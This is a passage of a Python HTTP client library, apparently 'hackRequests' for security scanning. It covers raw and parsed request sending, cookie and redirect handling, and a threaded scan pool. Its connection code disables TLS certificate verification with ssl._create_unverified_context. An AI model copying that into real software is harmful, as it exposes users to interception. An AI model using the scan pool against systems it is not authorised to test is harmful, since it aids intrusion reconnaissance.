80 |                     proxy[0], int(proxy[1]), timeout=self.timeout)
81 |                 con.set_tunnel(host, port)
82 |             else:
83 |                 con = client.HTTPConnection(host, port, timeout=self.timeout)
84 |             # con.connect()
85 |             return con
86 |         for p in self.protocol:
87 |             context = ssl._create_unverified_context(p)
88 |             try:
89 |                 if proxy:
90 |
con = client.HTTPSConnection( 91 | proxy[0], proxy[1], context=context, 92 | timeout=self.timeout) 93 | con.set_tunnel(host, port) 94 | else: 95 | con = client.HTTPSConnection( 96 | host, port, context=context, timeout=self.timeout) 97 | # con.connect() 98 | return con 99 | except ssl.SSLError: 100 | pass 101 | raise Exception('connect err') 102 | 103 | 104 | class hackRequests(object): 105 | ''' 106 | hackRequests是主要http请求函数。 107 | 108 | 可以通过http或者httpraw来访问网络 109 | ''' 110 | 111 | def __init__(self, conpool=None): 112 | self.lock = threading.Lock() 113 | 114 | if conpool is None: 115 | self.httpcon = httpcon(timeout=17) 116 | else: 117 | self.httpcon = conpool 118 | 119 | def _get_urlinfo(self, url, realhost: str): 120 | p = parse.urlparse(url) 121 | scheme = p.scheme.lower() 122 | if scheme != "http" and scheme != "https": 123 | raise Exception("http/https only") 124 | hostname = p.netloc 125 | port = 80 if scheme == "http" else 443 126 | if ":" in hostname: 127 | hostname, port = hostname.split(":") 128 | path = "" 129 | if p.path: 130 | path = p.path 131 | if p.query: 132 | path = path + "?" + p.query 133 | if realhost: 134 | if ":" not in realhost: 135 | realhost = realhost + ":80" 136 | hostname, port = realhost.split(":") 137 | return scheme, hostname, int(port), path 138 | 139 | def _send_output(self, oldfun, con, log): 140 | def _send_output_hook(*args, **kwargs): 141 | log['request'] = b"\r\n".join(con._buffer).decode('utf-8') 142 | oldfun(*args, **kwargs) 143 | con._send_output = oldfun 144 | 145 | return _send_output_hook 146 | 147 | def httpraw(self, raw: str, **kwargs): 148 | raw = raw.strip() 149 | proxy = kwargs.get("proxy", None) 150 | real_host = kwargs.get("real_host", None) 151 | ssl = kwargs.get("ssl", False) 152 | location = kwargs.get("location", True) 153 | 154 | scheme = 'http' 155 | port = 80 156 | if ssl: 157 | scheme = 'https' 158 | port = 443 159 | 160 | try: 161 | index = raw.index('\n') 162 | except ValueError: 163 | raise Exception("ValueError") 164 | log = {} 165 | try: 166 | method, path, protocol = raw[:index].split(" ") 167 | except: 168 | raise Exception("Protocol format error") 169 | raw = raw[index + 1:] 170 | 171 | try: 172 | host_start = raw.index("Host: ") 173 | host_end = raw.index('\n', host_start) 174 | 175 | except ValueError: 176 | raise ValueError("Host headers not found") 177 | 178 | if real_host: 179 | host = real_host 180 | if ":" in real_host: 181 | host, port = real_host.split(":") 182 | else: 183 | host = raw[host_start + len("Host: "):host_end] 184 | if ":" in host: 185 | host, port = host.split(":") 186 | raws = raw.splitlines() 187 | headers = {} 188 | 189 | # index = 0 190 | # for r in raws: 191 | # raws[index] = r.lstrip() 192 | # index += 1 193 | 194 | index = 0 195 | for r in raws: 196 | if r == "": 197 | break 198 | try: 199 | k, v = r.split(": ") 200 | except: 201 | k = r 202 | v = "" 203 | headers[k] = v 204 | index += 1 205 | headers["Connection"] = "close" 206 | if len(raws) < index + 1: 207 | body = '' 208 | else: 209 | body = '\n'.join(raws[index + 1:]).lstrip() 210 | 211 | urlinfo = scheme, host, int(port), path 212 | 213 | try: 214 | conn = self.httpcon.get_con(urlinfo, proxy=proxy) 215 | except: 216 | raise 217 | conn._send_output = self._send_output(conn._send_output, conn, log) 218 | try: 219 | conn.putrequest(method, path, skip_host=True, skip_accept_encoding=True) 220 | for k, v in headers.items(): 221 | conn.putheader(k, v) 222 | if body and "Content-Length" not in headers and "Transfer-Encoding" not in headers: 
223 | length = conn._get_content_length(body, method) 224 | conn.putheader("Content-Length", length) 225 | conn.endheaders() 226 | if body: 227 | if headers.get("Transfer-Encoding", '').lower() == "chunked": 228 | body = body.replace('\r\n', '\n') 229 | body = body.replace('\n', '\r\n') 230 | body = body + "\r\n" * 2 231 | log["request"] += "\r\n" + body 232 | conn.send(body.encode('utf-8')) 233 | rep = conn.getresponse() 234 | except socket.timeout: 235 | raise HackError("socket connect timeout") 236 | except socket.gaierror: 237 | raise HackError("socket don't get hostname") 238 | except KeyboardInterrupt: 239 | raise HackError("user exit") 240 | finally: 241 | conn.close() 242 | log["response"] = "HTTP/%.1f %d %s" % ( 243 | rep.version * 0.1, rep.status, 244 | rep.reason) + '\r\n' + str(rep.msg) 245 | if port == 80 or port == 443: 246 | _url = "{scheme}://{host}{path}".format(scheme=scheme, host=host, path=path) 247 | else: 248 | _url = "{scheme}://{host}{path}".format(scheme=scheme, host=host + ":" + port, path=path) 249 | 250 | redirect = rep.msg.get('location', None) # handle 301/302 251 | if redirect and location: 252 | if not redirect.startswith('http'): 253 | redirect = parse.urljoin(_url, redirect) 254 | return self.http(redirect, post=None, method=method, headers=headers, location=True, locationcount=1) 255 | 256 | return response(rep, _url, log, ) 257 | 258 | def http(self, url, **kwargs): 259 | method = kwargs.get("method", "GET") 260 | post = kwargs.get("post", None) or kwargs.get("data", None) 261 | location = kwargs.get('location', True) 262 | locationcount = kwargs.get("locationcount", 0) 263 | 264 | proxy = kwargs.get('proxy', None) 265 | headers = kwargs.get('headers', {}) 266 | 267 | # real host:ip 268 | real_host = kwargs.get("real_host", None) 269 | 270 | if isinstance(headers, str): 271 | headers = extract_dict(headers.strip(), '\n', ': ') 272 | cookie = kwargs.get("cookie", None) 273 | if cookie: 274 | cookiestr = cookie 275 | if isinstance(cookie, dict): 276 | cookiestr = "" 277 | for k, v in cookie.items(): 278 | cookiestr += "{}={}; ".format(k, v) 279 | cookiestr = cookiestr.strip("; ") 280 | headers["Cookie"] = cookiestr 281 | for arg_key, h in [ 282 | ('referer', 'Referer'), 283 | ('user_agent', 'User-Agent'), ]: 284 | if kwargs.get(arg_key): 285 | headers[h] = kwargs.get(arg_key) 286 | if "Content-Length" in headers: 287 | del headers["Content-Length"] 288 | 289 | urlinfo = scheme, host, port, path = self._get_urlinfo(url, real_host) 290 | log = {} 291 | try: 292 | conn = self.httpcon.get_con(urlinfo, proxy=proxy) 293 | except: 294 | raise 295 | conn._send_output = self._send_output(conn._send_output, conn, log) 296 | tmp_headers = copy.deepcopy(headers) 297 | if post: 298 | method = "POST" 299 | if isinstance(post, str): 300 | try: 301 | post = extract_dict(post, sep="&") 302 | except: 303 | pass 304 | try: 305 | post = parse.urlencode(post) 306 | except: 307 | pass 308 | if "Content-Type" not in headers: 309 | tmp_headers["Content-Type"] = kwargs.get( 310 | "Content-type", "application/json") 311 | if 'Accept' not in headers: 312 | tmp_headers["Accept"] = tmp_headers.get("Accept", "*/*") 313 | if 'Accept-Encoding' not in headers: 314 | tmp_headers['Accept-Encoding'] = tmp_headers.get("Accept-Encoding", "gzip, deflate") 315 | if 'Connection' not in headers: 316 | tmp_headers['Connection'] = 'close' 317 | if 'User-Agent' not in headers: 318 | tmp_headers['User-Agent'] = tmp_headers['User-Agent'] if tmp_headers.get( 319 | 'User-Agent') else 'Mozilla/5.0 
(Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36' 320 | 321 | try: 322 | conn.request(method, path, post, tmp_headers) 323 | rep = conn.getresponse() 324 | # body = rep.read() 325 | except socket.timeout: 326 | raise HackError("socket connect timeout") 327 | except socket.gaierror: 328 | raise HackError("socket don't get hostname") 329 | except KeyboardInterrupt: 330 | raise HackError("user exit") 331 | finally: 332 | conn.close() 333 | 334 | if post: 335 | log["request"] += "\r\n\r\n" + post 336 | log["response"] = "HTTP/%.1f %d %s" % ( 337 | rep.version * 0.1, rep.status, 338 | rep.reason) + '\r\n' + str(rep.msg) 339 | 340 | redirect = rep.msg.get('location', None) # handle 301/302 341 | if redirect and location and locationcount < 10: 342 | if not redirect.startswith('http'): 343 | redirect = parse.urljoin(url, redirect) 344 | return self.http(redirect, post=None, method=method, headers=tmp_headers, location=True, 345 | locationcount=locationcount + 1) 346 | 347 | if not redirect: 348 | redirect = url 349 | log["url"] = redirect 350 | return response(rep, redirect, log, cookie) 351 | 352 | 353 | class response(object): 354 | 355 | def __init__(self, rep, redirect, log, oldcookie=''): 356 | self.rep = rep 357 | self.status_code = self.rep.status # response code 358 | self.url = redirect 359 | self._content = b'' 360 | 361 | _header_dict = dict() 362 | self.cookie = "" 363 | for k, v in self.rep.getheaders(): 364 | _header_dict[k] = v 365 | # handle cookie 366 | if k == "Set-Cookie": 367 | if ";" in v: 368 | self.cookie += v.strip().split(";")[0] + "; " 369 | else: 370 | self.cookie = v.strip() + "; " 371 | 372 | if oldcookie: 373 | cookie_dict = self._cookie_update(oldcookie, self.cookie) 374 | self.cookie = "" 375 | for k, v in cookie_dict.items(): 376 | self.cookie += "{}={}; ".format(k, v) 377 | self.cookie = self.cookie.rstrip("; ") 378 | try: 379 | self.cookies = extract_dict(self.cookie, "; ", "=") 380 | except: 381 | self.cookies = {} 382 | 383 | self.headers = _header_dict 384 | self.header = str(self.rep.msg) # response header 385 | self.log = log 386 | charset = self.rep.msg.get('content-type', 'utf-8') 387 | try: 388 | self.charset = charset.split("charset=")[1] 389 | except: 390 | self.charset = "utf-8" 391 | 392 | def content(self): 393 | if self._content: 394 | return self._content 395 | encode = self.rep.msg.get('content-encoding', None) 396 | try: 397 | body = self.rep.read() 398 | except socket.timeout: 399 | body = b'' 400 | if encode == 'gzip': 401 | body = gzip.decompress(body) 402 | elif encode == 'deflate': 403 | try: 404 | body = zlib.decompress(body, -zlib.MAX_WBITS) 405 | except: 406 | body = zlib.decompress(body) 407 | # redirect = self.rep.msg.get('location', None) # handle 301/302 408 | self._content = body 409 | return body 410 | 411 | def text(self): 412 | ''' 413 | 414 | :return: text 415 | ''' 416 | body = self.content() 417 | 418 | try: 419 | text = body.decode(self.charset, 'ignore') 420 | except: 421 | text = str(body) 422 | self.log["response"] += '\r\n' + text[:4096] 423 | return text 424 | 425 | def _cookie_update(self, old, new): 426 | ''' 427 | 用于更新旧cookie,与新cookie得出交集后返回新的cookie 428 | :param old:旧cookie 429 | :param new:新cookie 430 | :return:Str:新cookie 431 | ''' 432 | # 先将旧cookie转换为字典,再将新cookie转换为字典时覆盖旧cookie 433 | old_sep = old.strip().split(";") 434 | new_sep = new.strip().split(";") 435 | cookie_dict = {} 436 | for sep in old_sep: 437 | if sep == "": 438 | continue 439 | try: 440 | k, v = 
sep.split("=") 441 | cookie_dict[k.strip()] = v 442 | except: 443 | continue 444 | for sep in new_sep: 445 | if sep == "": 446 | continue 447 | try: 448 | k, v = sep.split("=") 449 | cookie_dict[k.strip()] = v 450 | except: 451 | continue 452 | return cookie_dict 453 | 454 | 455 | class threadpool: 456 | 457 | def __init__(self, threadnum, callback, timeout=10): 458 | self.thread_count = self.thread_nums = threadnum 459 | self.queue = queue.Queue() 460 | con = httpcon(timeout=timeout) 461 | self.hack = hackRequests(con) 462 | self.isContinue = True 463 | self.thread_count_lock = threading.Lock() 464 | self._callback = callback 465 | 466 | def push(self, payload): 467 | self.queue.put(payload) 468 | 469 | def changeThreadCount(self, num): 470 | self.thread_count_lock.acquire() 471 | self.thread_count += num 472 | self.thread_count_lock.release() 473 | 474 | def stop(self): 475 | self.isContinue = False 476 | 477 | def run(self): 478 | th = [] 479 | for i in range(self.thread_nums): 480 | t = threading.Thread(target=self.scan) 481 | t.setDaemon(True) 482 | t.start() 483 | th.append(t) 484 | 485 | # It can quit with Ctrl-C 486 | try: 487 | while 1: 488 | if self.thread_count > 0 and self.isContinue: 489 | time.sleep(0.01) 490 | else: 491 | break 492 | except KeyboardInterrupt: 493 | exit("User Quit") 494 | 495 | def http(self, url, **kwargs): 496 | func = self.hack.http 497 | self.queue.put({"func": func, "url": url, "kw": kwargs}) 498 | 499 | def httpraw(self, raw: str, ssl: bool = False, proxy=None, location=True): 500 | func = self.hack.httpraw 501 | self.queue.put({"func": func, "raw": raw, "ssl": ssl, 502 | "proxy": proxy, "location": location}) 503 | 504 | def scan(self): 505 | while 1: 506 | if self.queue.qsize() > 0 and self.isContinue: 507 | p = self.queue.get() 508 | else: 509 | break 510 | 511 | func = p.pop("func") 512 | url = p.get("url", None) 513 | try: 514 | if url is None: 515 | raw = p.pop('raw') 516 | h = func(raw, **p) 517 | else: 518 | h = func(url, **p.get("kw")) 519 | self._callback(h) 520 | except Exception as e: 521 | print(url, e) 522 | self.changeThreadCount(-1) 523 | 524 | 525 | def http(url, **kwargs): 526 | # timeout = kwargs.get("timeout", 10) 527 | # con = httpcon(timeout=timeout) 528 | hack = hackRequests() 529 | return hack.http(url, **kwargs) 530 | 531 | 532 | def httpraw(raw: str, **kwargs): 533 | # con = httpcon(timeout=timeout) 534 | # hack = hackRequests(con) 535 | hack = hackRequests() 536 | return hack.httpraw(raw, **kwargs) 537 | 538 | 539 | if __name__ == '__main__': 540 | pass 541 | --------------------------------------------------------------------------------